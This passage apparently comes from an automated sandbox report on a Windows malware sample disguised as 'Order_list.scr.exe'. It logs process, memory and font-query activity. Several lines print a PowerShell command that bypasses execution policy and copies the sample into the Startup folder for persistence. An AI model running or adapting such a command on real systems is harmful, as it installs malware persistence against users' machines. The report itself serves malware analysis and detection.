            Source: Order_list.scr.exe, 00000003.00000002.4138704611.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4137789541.0000000000A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06327D90 LdrInitializeThunk,8_2_06327D90
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Users\user\Desktop\Order_list.scr.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
